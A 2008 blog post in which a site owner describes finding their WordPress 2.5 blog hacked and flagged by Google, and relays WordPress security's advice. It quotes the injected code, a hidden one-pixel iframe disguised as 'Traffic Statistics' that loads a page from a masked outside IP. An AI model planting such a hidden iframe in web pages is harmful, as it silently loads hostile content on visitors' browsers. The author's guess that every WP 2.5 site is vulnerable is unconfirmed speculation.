Daily Archives: April 24, 2008

WordPress 2.5 Already Hacked Possibly – Beware!

So, I found out why my site was listed on Google as possibly harming your computer.

I upgraded to WP 2.5, and then I was hacked or whatever.

This code was inserted into my post from April 13th somehow:

<!– Traffic Statistics –> <iframe src=http://***.***.*.***/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –>

the IP of course has been deleted for protection, but it seems to me that essentially EVERYONE who now runs WP 2.5 is vulnerable to this.

I emailed WP security about it and haven’t heard back yet though…

Just pay attention to you site. It’s easiest to see this code or any code if you ‘view page source’ through right click on your blog page.

UPDATE!

I just heard back from WP Security.

Essentially he thinks I may have been hacked before I upgraded, which is possible, but doubtful, at least to me.

The post that was hacked was dated the 13th, I upgraded the 14th because of my Google issue. but I checked every post on this site and didn’t find that code in there in that post, I could have missed it yes.

I did find code in another post that I deleted and a strange FTP entry as well that I deleted also.

WP Security gave me a little plugin to use that emails me when anything changes to the site, and advised that I re-install WP just in case, and of course change passwords